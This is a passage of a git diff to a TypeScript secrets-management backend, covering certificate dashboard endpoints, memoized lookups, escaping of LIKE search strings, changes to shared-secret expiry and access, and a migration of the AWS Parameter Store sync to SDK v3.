String(regularFilters.extendedKeyUsage) }), + ...(regularFilters.keyAlgorithm && { keyAlgorithm: regularFilters.keyAlgorithm }), + ...(regularFilters.signatureAlgorithm && { signatureAlgorithm: String(regularFilters.signatureAlgorithm) }), + ...(regularFilters.keySizes && { keySizes: regularFilters.keySizes }), + ...(regularFilters.caIds && { caIds: regularFilters.caIds }), + ...(regularFilters.enrollmentTypes && { enrollmentTypes: regularFilters.enrollmentTypes }), + ...(regularFilters.source && { source: regularFilters.source }), + ...(regularFilters.notAfterFrom && { notAfterFrom: regularFilters.notAfterFrom }), + ...(regularFilters.notAfterTo && { notAfterTo: regularFilters.notAfterTo }), + ...(regularFilters.notBeforeFrom && { notBeforeFrom: regularFilters.notBeforeFrom }), + ...(regularFilters.notBeforeTo && { notBeforeTo: regularFilters.notBeforeTo }) }; const count = forPkiSync ? await certificateDAL.countActiveCertificatesForSync(countFilter) - : await certificateDAL.countCertificatesInProject(countFilter); + : await certificateDAL.countCertificatesInProject(countFilter, permissionFilters); return { certificates, @@ -1288,6 +1342,104 @@ export const projectServiceFactory = ({ }; }; + const getDashboardStats = async ({ filter, actorId, actorOrgId, actorAuthMethod, actor }: TGetDashboardStatsDTO) => { + const project = await projectDAL.findProjectByFilter(filter); + const projectId = project.id; + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Read, + ProjectPermissionSub.Certificates + ); + + return withCache({ + keyStore, + key: KeyStorePrefixes.CertDashboardStats(projectId), + ttlSeconds: KeyStoreTtls.DashboardCacheInSeconds, + fetcher: () => certificateDAL.getDashboardStats(projectId) + }); + }; + + const getActivityTrend = async ({ + filter, + range = "30d", + actorId, + actorOrgId, + actorAuthMethod, + actor + }: TGetActivityTrendDTO) => { + const project = await projectDAL.findProjectByFilter(filter); + const projectId = project.id; + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Read, + ProjectPermissionSub.Certificates + ); + + const rangeDaysMap: Record = { "7d": 7, "30d": 30, "6m": 180 }; + const daysBack = rangeDaysMap[range]; + + return withCache({ + keyStore, + key: KeyStorePrefixes.CertActivityTrend(projectId, range), + ttlSeconds: KeyStoreTtls.DashboardCacheInSeconds, + fetcher: () => certificateDAL.getActivityTrend(projectId, daysBack) + }); + }; + + const getPqcTrend = async ({ + filter, + range = "30d", + actorId, + actorOrgId, + actorAuthMethod, + actor + }: TGetActivityTrendDTO) => { + const project = await projectDAL.findProjectByFilter(filter); + const projectId = project.id; + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Read, + ProjectPermissionSub.Certificates + ); + + const rangeDaysMap: Record = { "7d": 7, "30d": 30, "6m": 180 }; + const daysBack = rangeDaysMap[range]; + + return withCache({ + keyStore, + key: KeyStorePrefixes.CertPqcTrend(projectId, range), + ttlSeconds: KeyStoreTtls.DashboardCacheInSeconds, + fetcher: () => certificateDAL.getPqcTrend(projectId, daysBack) + }); + }; + /** * Return list of (PKI) alerts configured for project */ @@ -1703,13 +1855,6 @@ export const projectServiceFactory = ({ actorAuthMethod, projectId }: TGetProjectSshConfig) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -1722,12 +1867,12 @@ export const projectServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.Settings); const projectSshConfig = await projectSshConfigDAL.findOne({ - projectId: project.id + projectId }); if (!projectSshConfig) { throw new NotFoundError({ - message: `Project SSH config with ID '${project.id}' not found` + message: `Project SSH config with ID '${projectId}' not found` }); } @@ -1743,13 +1888,6 @@ export const projectServiceFactory = ({ defaultUserSshCaId, defaultHostSshCaId }: TUpdateProjectSshConfig) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -1762,12 +1900,12 @@ export const projectServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Edit, ProjectPermissionSub.Settings); let projectSshConfig = await projectSshConfigDAL.findOne({ - projectId: project.id + projectId }); if (!projectSshConfig) { throw new NotFoundError({ - message: `Project SSH config with ID '${project.id}' not found` + message: `Project SSH config with ID '${projectId}' not found` }); } @@ -1776,7 +1914,7 @@ export const projectServiceFactory = ({ const userSshCa = await sshCertificateAuthorityDAL.findOne( { id: defaultUserSshCaId, - projectId: project.id + projectId }, tx ); @@ -1792,7 +1930,7 @@ export const projectServiceFactory = ({ const hostSshCa = await sshCertificateAuthorityDAL.findOne( { id: defaultHostSshCaId, - projectId: project.id + projectId }, tx ); @@ -1827,13 +1965,6 @@ export const projectServiceFactory = ({ projectId, integration }: TGetProjectWorkflowIntegrationConfig) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -1847,7 +1978,7 @@ export const projectServiceFactory = ({ if (integration === WorkflowIntegration.SLACK) { const config = await projectSlackConfigDAL.findOne({ - projectId: project.id + projectId }); if (!config) { @@ -1865,7 +1996,7 @@ export const projectServiceFactory = ({ if (integration === WorkflowIntegration.MICROSOFT_TEAMS) { const config = await projectMicrosoftTeamsConfigDAL.findOne({ - projectId: project.id + projectId }); if (!config) { @@ -1905,7 +2036,9 @@ export const projectServiceFactory = ({ isSecretSyncErrorNotificationEnabled?: boolean; secretSyncErrorChannels?: string; }) => { - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) { throw new NotFoundError({ message: `Project with ID '${projectId}' not found` @@ -2114,13 +2247,6 @@ export const projectServiceFactory = ({ integrationId, integration }: TDeleteProjectWorkflowIntegration) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -2262,7 +2388,9 @@ export const projectServiceFactory = ({ } const org = await orgDAL.findOne({ id: permission.orgId }); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const userDetails = await userDAL.findById(permission.id); const appCfg = getConfig(); @@ -2316,6 +2444,9 @@ export const projectServiceFactory = ({ upgradeProject, listProjectCas, listProjectCertificates, + getDashboardStats, + getActivityTrend, + getPqcTrend, listProjectAlerts, listProjectPkiCollections, listProjectCertificateTemplates, diff --git a/backend/src/services/project/project-types.ts b/backend/src/services/project/project-types.ts index cd35ab114b0..59f8fe8a3c4 100644 --- a/backend/src/services/project/project-types.ts +++ b/backend/src/services/project/project-types.ts @@ -152,6 +152,27 @@ export type TListProjectCertsDTO = { toDate?: Date; metadataFilter?: Array<{ key: string; value?: string }>; extendedKeyUsage?: string; + keyAlgorithm?: string | string[]; + signatureAlgorithm?: string; + keySizes?: number[]; + caIds?: string[]; + enrollmentTypes?: string[]; + source?: string | string[]; + notAfterFrom?: Date; + notAfterTo?: Date; + notBeforeFrom?: Date; + notBeforeTo?: Date; + sortBy?: string; + sortOrder?: "asc" | "desc"; +} & Omit; + +export type TGetDashboardStatsDTO = { + filter: Filter; +} & Omit; + +export type TGetActivityTrendDTO = { + filter: Filter; + range?: string; } & Omit; export type TListProjectAlertsDTO = TProjectPermission; diff --git a/backend/src/services/reminder/reminder-dal.ts b/backend/src/services/reminder/reminder-dal.ts index 4161552a95e..bad70197169 100644 --- a/backend/src/services/reminder/reminder-dal.ts +++ b/backend/src/services/reminder/reminder-dal.ts @@ -148,11 +148,58 @@ export const reminderDALFactory = (db: TDbClient) => { return reminders; }; + const findByProjectAndDateRange = async ( + { + projectId, + startDate, + endDate + }: { + projectId: string; + startDate: Date; + endDate: Date; + }, + tx?: Knex + ) => { + const query = (tx || db.replicaNode())(TableName.Reminder) + .whereNotNull(`${TableName.Reminder}.secretId`) + .whereBetween(`${TableName.Reminder}.nextReminderDate`, [startDate, endDate]) + .join(TableName.SecretV2, `${TableName.Reminder}.secretId`, `${TableName.SecretV2}.id`) + .join(TableName.SecretFolder, `${TableName.SecretV2}.folderId`, `${TableName.SecretFolder}.id`) + .join( + TableName.Environment, + `${TableName.SecretFolder}.envId`, + `${TableName.Environment}.id` + ) + .where(`${TableName.Environment}.projectId`, projectId); + + const rawReminders = await query + .select(selectAllTableCols(TableName.Reminder)) + .select( + db.ref("key").withSchema(TableName.SecretV2).as("secretKey"), + db.ref("folderId").withSchema(TableName.SecretV2).as("secretFolderId"), + db.ref("slug").withSchema(TableName.Environment).as("envSlug"), + db.ref("name").withSchema(TableName.Environment).as("envName") + ); + + return rawReminders.map((r) => ({ + id: r.id, + secretId: r.secretId, + secretKey: (r as unknown as Record).secretKey, + nextReminderDate: r.nextReminderDate, + message: r.message, + repeatDays: r.repeatDays, + folderId: (r as unknown as Record).secretFolderId, + envSlug: (r as unknown as Record).envSlug, + envName: (r as unknown as Record).envName + })); + }; + return { ...reminderOrm, findSecretDailyReminders, findUpcomingReminders, findSecretReminder, - findSecretReminders + findSecretReminders, + findByProjectAndDateRange }; }; diff --git a/backend/src/services/role/project/project-role-factory.ts b/backend/src/services/role/project/project-role-factory.ts index 2ab4e59d034..ce74c47fdb7 100644 --- a/backend/src/services/role/project/project-role-factory.ts +++ b/backend/src/services/role/project/project-role-factory.ts @@ -17,6 +17,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TRoleScopeFactory } from "../role-types"; @@ -119,7 +121,9 @@ export const newProjectRoleFactory = ({ const getPredefinedRoles: TRoleScopeFactory["getPredefinedRoles"] = async (scopeData) => { const scope = getScopeField(scopeData); - const project = await projectDAL.findById(scope.value); + const project = await requestMemoize(requestMemoKeys.projectFindById(scope.value), () => + projectDAL.findById(scope.value) + ); if (!project) throw new BadRequestError({ message: "Project not found" }); const projectId = project.id; @@ -136,7 +140,7 @@ export const newProjectRoleFactory = ({ }, { id: uuidv4(), - name: "Developer", + name: "Member", slug: ProjectMembershipRole.Member, permissions: projectMemberPermissions, description: "Limited read/write role in a project", diff --git a/backend/src/services/secret-folder/secret-folder-dal.ts b/backend/src/services/secret-folder/secret-folder-dal.ts index 29d69ec6ba1..076095f2fd3 100644 --- a/backend/src/services/secret-folder/secret-folder-dal.ts +++ b/backend/src/services/secret-folder/secret-folder-dal.ts @@ -3,7 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TSecretFolders, TSecretFoldersUpdate } from "@app/db/schemas"; import { BadRequestError, DatabaseError } from "@app/lib/errors"; -import { groupBy, removeTrailingSlash, unique } from "@app/lib/fn"; +import { groupBy, removeTrailingSlash, sanitizeSqlLikeString, unique } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; import { OrderByDirection } from "@app/lib/types"; import { isValidSecretPath } from "@app/lib/validator"; @@ -340,7 +340,7 @@ export const secretFolderDALFactory = (db: TDbClient) => { .where("isReserved", false) .where((bd) => { if (search) { - void bd.whereILike(`${TableName.SecretFolder}.name`, `%${search}%`); + void bd.whereILike(`${TableName.SecretFolder}.name`, `%${sanitizeSqlLikeString(search)}%`); } }) .leftJoin(TableName.Environment, `${TableName.Environment}.id`, `${TableName.SecretFolder}.envId`) diff --git a/backend/src/services/secret-folder/secret-folder-service.ts b/backend/src/services/secret-folder/secret-folder-service.ts index 033efdb14c3..7d50494516d 100644 --- a/backend/src/services/secret-folder/secret-folder-service.ts +++ b/backend/src/services/secret-folder/secret-folder-service.ts @@ -231,19 +231,19 @@ export const secretFolderServiceFactory = ({ tx ); - return doc; - }); + const [folderWithFullPath] = await folderDAL.findSecretPathByFolderIds(projectId, [doc.id], tx); - const [folderWithFullPath] = await folderDAL.findSecretPathByFolderIds(projectId, [folder.id]); + if (!folderWithFullPath) { + throw new NotFoundError({ + message: `Failed to retrieve path for folder with ID '${doc.id}'` + }); + } - if (!folderWithFullPath) { - throw new NotFoundError({ - message: `Failed to retrieve path for folder with ID '${folder.id}'` - }); - } + return { ...doc, path: folderWithFullPath.path }; + }); await snapshotService.performSnapshot(folder.parentId as string); - return { ...folder, path: folderWithFullPath.path }; + return folder; }; const updateManyFolders = async ({ @@ -461,7 +461,17 @@ export const secretFolderServiceFactory = ({ } } - const newFolder = await folderDAL.transaction(async (tx) => { + const { newFolder, newFolderPath, oldFolderPath } = await folderDAL.transaction(async (tx) => { + // Read the old folder path BEFORE the update to capture the original name in the path. + // This must be done inside the transaction to ensure read-after-write consistency + // when using read replicas, but before the UPDATE to get the old state. + const [oldFolderWithPath] = await folderDAL.findSecretPathByFolderIds(projectId, [folder.id], tx); + if (!oldFolderWithPath) { + throw new NotFoundError({ + message: `Failed to retrieve path for folder with ID '${folder.id}'` + }); + } + const [doc] = await folderDAL.update( { envId: env.id, id: folder.id, parentId: parentFolder.id, isReserved: false }, { name, description }, @@ -498,30 +508,23 @@ export const secretFolderServiceFactory = ({ tx ); if (!doc) throw new NotFoundError({ message: `Failed to update folder with ID '${id}'`, name: "UpdateFolder" }); - return doc; - }); - const foldersWithFullPaths = await folderDAL.findSecretPathByFolderIds(projectId, [newFolder.id, folder.id]); - - const newFolderWithFullPath = foldersWithFullPaths.find((f) => f?.id === newFolder.id); - if (!newFolderWithFullPath) { - throw new NotFoundError({ - message: `Failed to retrieve path for folder with ID '${newFolder.id}'` - }); - } + // Read the new folder path AFTER the update to get the updated name in the path. + const [newFolderWithPath] = await folderDAL.findSecretPathByFolderIds(projectId, [doc.id], tx); + if (!newFolderWithPath) { + throw new NotFoundError({ + message: `Failed to retrieve path for folder with ID '${doc.id}'` + }); + } - const folderWithFullPath = foldersWithFullPaths.find((f) => f?.id === folder.id); - if (!folderWithFullPath) { - throw new NotFoundError({ - message: `Failed to retrieve path for folder with ID '${folder.id}'` - }); - } + return { newFolder: doc, newFolderPath: newFolderWithPath.path, oldFolderPath: oldFolderWithPath.path }; + }); await snapshotService.performSnapshot(newFolder.parentId as string); await secretV2BridgeDAL.invalidateSecretCacheByProjectId(projectId); return { - folder: { ...newFolder, path: newFolderWithFullPath.path }, - old: { ...folder, path: folderWithFullPath.path } + folder: { ...newFolder, path: newFolderPath }, + old: { ...folder, path: oldFolderPath } }; }; @@ -900,7 +903,7 @@ export const secretFolderServiceFactory = ({ parentId: parentFolders.map((folder) => folder.id) }, isReserved: false, - $search: search ? { name: `%${search}%` } : undefined + $search: search ? { name: search } : undefined }, { countDistinct: "name" } ); diff --git a/backend/src/services/secret-import/secret-import-dal.ts b/backend/src/services/secret-import/secret-import-dal.ts index ca1b06af6c8..68dc96b217e 100644 --- a/backend/src/services/secret-import/secret-import-dal.ts +++ b/backend/src/services/secret-import/secret-import-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TSecretImports } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify } from "@app/lib/knex"; import { EnvironmentInfo, FolderInfo, FolderResult, SecretResult } from "./secret-import-types"; @@ -86,7 +87,7 @@ export const secretImportDALFactory = (db: TDbClient) => { .where(filter) .where((bd) => { if (search) { - void bd.whereILike("importPath", `%${search}%`); + void bd.whereILike("importPath", `%${sanitizeSqlLikeString(search)}%`); } }) .join(TableName.Environment, `${TableName.SecretImport}.importEnv`, `${TableName.Environment}.id`) @@ -172,7 +173,7 @@ export const secretImportDALFactory = (db: TDbClient) => { .where("isReplication", false) .where((bd) => { if (search) { - void bd.whereILike("importPath", `%${search}%`); + void bd.whereILike("importPath", `%${sanitizeSqlLikeString(search)}%`); } }) .join(TableName.Environment, `${TableName.SecretImport}.importEnv`, `${TableName.Environment}.id`) @@ -191,7 +192,7 @@ export const secretImportDALFactory = (db: TDbClient) => { .where(`${TableName.SecretImport}.isReserved`, false) .where((bd) => { if (search) { - void bd.whereILike(`${TableName.SecretImport}.importPath`, `%${search}%`); + void bd.whereILike(`${TableName.SecretImport}.importPath`, `%${sanitizeSqlLikeString(search)}%`); } }) .join(TableName.Environment, `${TableName.SecretImport}.importEnv`, `${TableName.Environment}.id`) diff --git a/backend/src/services/secret-sharing/secret-sharing-dal.ts b/backend/src/services/secret-sharing/secret-sharing-dal.ts index 8f6cb80235f..7f5c3624bf7 100644 --- a/backend/src/services/secret-sharing/secret-sharing-dal.ts +++ b/backend/src/services/secret-sharing/secret-sharing-dal.ts @@ -1,7 +1,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; -import { TableName, TSecretSharing } from "@app/db/schemas"; +import { TableName } from "@app/db/schemas"; import { DatabaseError, NotFoundError } from "@app/lib/errors"; import { ormify, selectAllTableCols } from "@app/lib/knex"; import { logger } from "@app/lib/logger"; @@ -90,16 +90,13 @@ export const secretSharingDALFactory = (db: TDbClient) => { const pruneExpiredSharedSecrets = async (tx?: Knex) => { logger.info(`${QueueName.DailyResourceCleanUp}: pruning expired shared secret started`); try { - const today = new Date(); + const sevenDaysAgo = new Date(); + sevenDaysAgo.setDate(sevenDaysAgo.getDate() - 7); + const docs = await (tx || db)(TableName.SecretSharing) - .where("expiresAt", "<", today) - .andWhere("encryptedValue", "<>", "") + .where("expiresAt", "<", sevenDaysAgo) .andWhere("type", SecretSharingType.Share) - .update({ - encryptedValue: "", - tag: "", - iv: "" - }); + .del(); logger.info(`${QueueName.DailyResourceCleanUp}: pruning expired shared secret completed`); return docs; } catch (error) { @@ -110,12 +107,12 @@ export const secretSharingDALFactory = (db: TDbClient) => { const pruneExpiredSecretRequests = async (tx?: Knex) => { logger.info(`${QueueName.DailyResourceCleanUp}: pruning expired secret requests started`); try { - const today = new Date(); + const sevenDaysAgo = new Date(); + sevenDaysAgo.setDate(sevenDaysAgo.getDate() - 7); const docs = await (tx || db)(TableName.SecretSharing) .whereNotNull("expiresAt") - .andWhere("expiresAt", "<", today) - .andWhere("encryptedSecret", null) + .andWhere("expiresAt", "<", sevenDaysAgo) .andWhere("type", SecretSharingType.Request) .delete(); @@ -127,31 +124,18 @@ export const secretSharingDALFactory = (db: TDbClient) => { } }; - const findActiveSharedSecrets = async (filters: Partial, tx?: Knex) => { + const softDeleteById = async (id: string, tx?: Knex) => { try { - const now = new Date(); - return await (tx || db.replicaNode())(TableName.SecretSharing) - .where(filters) - .andWhere("expiresAt", ">", now) - .andWhere("encryptedValue", "<>", "") - .andWhere("type", SecretSharingType.Share) - .select(selectAllTableCols(TableName.SecretSharing)) - .orderBy("expiresAt", "asc"); - } catch (error) { - throw new DatabaseError({ - error, - name: "Find Active Shared Secrets" - }); - } - }; - - const softDeleteById = async (id: string) => { - try { - await sharedSecretOrm.updateById(id, { - encryptedValue: "", - iv: "", - tag: "" - }); + await sharedSecretOrm.updateById( + id, + { + encryptedValue: "", + iv: "", + tag: "", + encryptedSecret: null + }, + tx + ); } catch (error) { throw new DatabaseError({ error, @@ -166,7 +150,6 @@ export const secretSharingDALFactory = (db: TDbClient) => { pruneExpiredSharedSecrets, pruneExpiredSecretRequests, softDeleteById, - findActiveSharedSecrets, getSecretRequestById }; }; diff --git a/backend/src/services/secret-sharing/secret-sharing-service.ts b/backend/src/services/secret-sharing/secret-sharing-service.ts index 38ac0b89bf8..b6c2384b9f3 100644 --- a/backend/src/services/secret-sharing/secret-sharing-service.ts +++ b/backend/src/services/secret-sharing/secret-sharing-service.ts @@ -1,4 +1,5 @@ import { ForbiddenError } from "@casl/ability"; +import { Knex } from "knex"; import { OrganizationActionScope, TOrganizations, TSecretSharing } from "@app/db/schemas"; import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; @@ -10,6 +11,8 @@ import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { ms } from "@app/lib/ms"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor, SecretSharingAccessType } from "@app/lib/types"; import { ActorType } from "../auth/auth-type"; @@ -100,6 +103,10 @@ export const secretSharingServiceFactory = ({ } }; + // Checks whether external (non-org) email access is available for this secret. + const $hasExternalEmailAccess = (sharedSecret: TSecretSharing): boolean => + Boolean(sharedSecret.allowExternalEmails && sharedSecret.password); + const createSharedSecret = async ({ actor, actorId, @@ -611,8 +618,9 @@ export const secretSharingServiceFactory = ({ } const isAuthorizedUser = await $isAuthorizedEmailUser(sharedSecret, actorId); + const hasExternalEmailAccess = $hasExternalEmailAccess(sharedSecret); - if (!isAuthorizedUser && !sharedSecret.allowExternalEmails) { + if (!isAuthorizedUser && !hasExternalEmailAccess) { if (!actorId) { throw new UnauthorizedError({ message: "Authentication required to view this secret" }); } @@ -626,17 +634,17 @@ export const secretSharingServiceFactory = ({ }; }; - const $decrementSecretViewCount = async (sharedSecret: TSecretSharing) => { + const $decrementSecretViewCount = async (sharedSecret: TSecretSharing, tx?: Knex) => { const { expiresAfterViews } = sharedSecret; + let payload: { lastViewedAt: Date; $decr?: { expiresAfterViews: number } } = { + lastViewedAt: new Date() + }; if (expiresAfterViews) { - // decrement view count if view count expiry set - await secretSharingDAL.updateById(sharedSecret.id, { $decr: { expiresAfterViews: 1 } }); + payload = { ...payload, $decr: { expiresAfterViews: 1 } }; } - await secretSharingDAL.updateById(sharedSecret.id, { - lastViewedAt: new Date() - }); + await secretSharingDAL.updateById(sharedSecret.id, payload, tx); }; /** Gets password-less secret. validates all secret's requested (must be fresh). */ @@ -644,10 +652,13 @@ export const secretSharingServiceFactory = ({ const result = await secretSharingDAL.transaction(async (tx) => { await tx.raw("SELECT pg_advisory_xact_lock(?)", [PgSqlLock.AccessSharedSecret(sharedSecretId)]); - const sharedSecret = await secretSharingDAL.findOne({ - type: SecretSharingType.Share, - identifier: Buffer.from(sharedSecretId, "base64url").toString("hex") - }); + const sharedSecret = await secretSharingDAL.findOne( + { + type: SecretSharingType.Share, + identifier: Buffer.from(sharedSecretId, "base64url").toString("hex") + }, + tx + ); if (!sharedSecret) { throw new NotFoundError({ @@ -666,8 +677,9 @@ export const secretSharingServiceFactory = ({ } const isAuthorizedUser = await $isAuthorizedEmailUser(sharedSecret, actorId); + const hasExternalEmailAccess = $hasExternalEmailAccess(sharedSecret); - if (!isAuthorizedUser && !sharedSecret.allowExternalEmails) { + if (!isAuthorizedUser && !hasExternalEmailAccess) { if (!actorId) { throw new UnauthorizedError({ message: "Authentication required to view this secret" }); } @@ -678,13 +690,13 @@ export const secretSharingServiceFactory = ({ // or can be safely sent to the client. if (expiresAt !== null && expiresAt < new Date()) { // check lifetime expiry - await secretSharingDAL.softDeleteById(sharedSecret.id); + await secretSharingDAL.softDeleteById(sharedSecret.id, tx); throw new NotFoundError({ message: "The shared secret has expired" }); } if (expiresAfterViews !== null && expiresAfterViews === 0) { // check view count expiry - await secretSharingDAL.softDeleteById(sharedSecret.id); + await secretSharingDAL.softDeleteById(sharedSecret.id, tx); throw new NotFoundError({ message: "The shared secret has reached its view limit" }); } @@ -716,11 +728,14 @@ export const secretSharingServiceFactory = ({ sharedSecret.orgId === orgId && sharedSecret.accessType === SecretSharingAccessType.Organization ) { - organization = await orgDAL.findOrgById(sharedSecret.orgId); + const sharedOrgId = sharedSecret.orgId; + organization = await requestMemoize(requestMemoKeys.orgFindOrgById(sharedOrgId), () => + orgDAL.findOrgById(sharedOrgId) + ); } // decrement when we are sure the user will view secret. - await $decrementSecretViewCount(sharedSecret); + await $decrementSecretViewCount(sharedSecret, tx); return { ...mapIdentifierToId(sharedSecret), @@ -817,7 +832,7 @@ export const secretSharingServiceFactory = ({ return null; } - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); const assets = await orgAssetDAL.listAssetsByType(orgId, ["brand-logo", "brand-favicon"]); const hasLogo = assets.some((a) => a.assetType === "brand-logo"); diff --git a/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts b/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts index bdef5d97fa7..695640f52bf 100644 --- a/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts +++ b/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts @@ -1,7 +1,27 @@ -import type { AWSError } from "aws-sdk"; -import SSM from "aws-sdk/clients/ssm.js"; +import { + AccessDeniedException, + AddTagsToResourceCommand, + type AddTagsToResourceCommandInput, + type AddTagsToResourceCommandOutput, + DeleteParametersCommand, + type DeleteParametersCommandOutput, + DescribeParametersCommand, + GetParametersByPathCommand, + ListTagsForResourceCommand, + type Parameter, + type ParameterMetadata, + PutParameterCommand, + type PutParameterCommandInput, + type PutParameterCommandOutput, + RemoveTagsFromResourceCommand, + type RemoveTagsFromResourceCommandInput, + type RemoveTagsFromResourceCommandOutput, + SSMClient, + type Tag +} from "@aws-sdk/client-ssm"; import handlebars from "handlebars"; +import { isAwsError } from "@app/lib/aws/error"; import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; import { SecretSyncError } from "@app/services/secret-sync/secret-sync-errors"; import { matchesSchema } from "@app/services/secret-sync/secret-sync-fns"; @@ -9,8 +29,8 @@ import { TSecretMap } from "@app/services/secret-sync/secret-sync-types"; import { TAwsParameterStoreSyncWithCredentials } from "./aws-parameter-store-sync-types"; -type TAWSParameterStoreRecord = Record; -type TAWSParameterStoreMetadataRecord = Record; +type TAWSParameterStoreRecord = Record; +type TAWSParameterStoreMetadataRecord = Record; type TAWSParameterStoreTagsRecord = Record>; const MAX_RETRIES = 10; @@ -21,14 +41,10 @@ const getSSM = async (secretSync: TAwsParameterStoreSyncWithCredentials) => { const config = await getAwsConnectionConfig(connection, destinationConfig.region); - const ssm = new SSM({ - apiVersion: "2014-11-06", - region: destinationConfig.region + return new SSMClient({ + region: destinationConfig.region, + credentials: config.credentials }); - - ssm.config.update(config); - - return ssm; }; const sleep = async () => @@ -63,7 +79,7 @@ const getFullPath = ({ path, keySchema, environment }: { path: string; keySchema }; const getParametersByPath = async ( - ssm: SSM, + ssm: SSMClient, path: string, keySchema: string | undefined, environment: string @@ -78,15 +94,15 @@ const getParametersByPath = async ( while (hasNext) { try { // eslint-disable-next-line no-await-in-loop - const parameters = await ssm - .getParametersByPath({ + const parameters = await ssm.send( + new GetParametersByPathCommand({ Path: fullPath, Recursive: false, WithDecryption: true, MaxResults: BATCH_SIZE, NextToken: nextToken }) - .promise(); + ); attempt = 0; @@ -103,7 +119,7 @@ const getParametersByPath = async ( hasNext = Boolean(parameters.NextToken); nextToken = parameters.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -119,7 +135,7 @@ const getParametersByPath = async ( }; const getParameterMetadataByPath = async ( - ssm: SSM, + ssm: SSMClient, path: string, keySchema: string | undefined, environment: string @@ -134,8 +150,8 @@ const getParameterMetadataByPath = async ( while (hasNext) { try { // eslint-disable-next-line no-await-in-loop - const parameters = await ssm - .describeParameters({ + const parameters = await ssm.send( + new DescribeParametersCommand({ MaxResults: 10, NextToken: nextToken, ParameterFilters: [ @@ -146,7 +162,7 @@ const getParameterMetadataByPath = async ( } ] }) - .promise(); + ); attempt = 0; @@ -163,7 +179,7 @@ const getParameterMetadataByPath = async ( hasNext = Boolean(parameters.NextToken); nextToken = parameters.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -179,7 +195,7 @@ const getParameterMetadataByPath = async ( }; const getParameterStoreTagsRecord = async ( - ssm: SSM, + ssm: SSMClient, awsParameterStoreSecretsRecord: TAWSParameterStoreRecord, needsTagsPermissions: boolean ): Promise<{ shouldManageTags: boolean; awsParameterStoreTagsRecord: TAWSParameterStoreTagsRecord }> => { @@ -194,18 +210,20 @@ const getParameterStoreTagsRecord = async ( } try { - const tags = await ssm - .listTagsForResource({ + const tags = await ssm.send( + new ListTagsForResourceCommand({ ResourceType: "Parameter", ResourceId: parameter.Name }) - .promise(); + ); - awsParameterStoreTagsRecord[key] = Object.fromEntries(tags.TagList?.map((tag) => [tag.Key, tag.Value]) ?? []); + awsParameterStoreTagsRecord[key] = Object.fromEntries( + tags.TagList?.map((tag) => [tag.Key ?? "", tag.Value ?? ""]) ?? [] + ); } catch (e) { // users aren't required to provide tag permissions to use sync so we handle gracefully if unauthorized // and they aren't trying to configure tags - if ((e as AWSError).code === "AccessDeniedException") { + if (e instanceof AccessDeniedException) { if (!needsTagsPermissions) { return { 